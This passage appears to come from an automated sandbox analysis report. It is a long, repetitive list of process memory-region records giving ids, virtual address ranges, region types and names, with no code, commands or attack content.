"pagefile_0x00000000002a0000" filename = "" Region: id = 6817 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6818 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6819 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6820 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6821 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6822 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6823 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6824 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6825 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6826 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6827 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6828 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6829 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6830 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6831 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6832 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6833 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6834 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6835 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6836 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6837 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6838 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6839 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6840 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6841 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6842 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6843 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6844 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6845 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6846 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6847 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6848 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6849 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 6850 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 6851 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 6852 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 6853 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6854 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6855 start_va = 0x2a0000 end_va = 0x2b0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6856 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6857 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6858 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6859 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6860 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6861 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6862 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6863 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6864 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6865 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6866 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6867 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6868 start_va = 0x2a0000 
end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6869 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6870 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6871 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6872 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6873 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6874 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6875 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6876 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6887 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6888 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6889 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6890 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6891 
start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6892 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6893 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6894 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6895 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6896 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6897 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6898 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6899 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6900 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6901 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6902 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6903 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 6904 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6905 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6906 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6907 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6908 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6909 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6910 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6911 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6912 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7042 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 7043 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 7044 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 7045 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" 
filename = "" Region: id = 7046 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7047 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7048 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7049 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7050 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7051 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7052 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7053 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7054 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7055 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7056 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7057 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7058 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 7059 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7060 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7061 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7062 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7063 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7064 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7065 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7066 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7067 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7068 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7069 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7070 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7071 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7072 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7073 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7074 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7075 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7076 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7077 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7078 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7079 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7090 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7091 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7092 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7093 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7094 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7095 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7096 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7097 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7098 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7099 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7100 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7101 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7102 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7103 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7104 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 7105 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 7106 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 7107 start_va = 0x2b0000 end_va = 0x2c1fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 7108 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7109 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7110 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7111 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7112 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7113 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7114 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7115 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7116 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7117 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7118 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7119 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7120 start_va = 0x2a0000 
end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7121 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7122 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7123 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7124 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7125 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7126 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7127 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7128 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7129 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7130 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7131 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7132 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7133 
start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7134 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7135 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7136 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7137 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7138 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7139 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7140 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7141 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7142 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7143 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7144 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7145 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 7146 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7147 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7148 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7149 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7150 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7151 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7152 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7153 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7154 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7155 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7156 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7157 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 7305 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" 
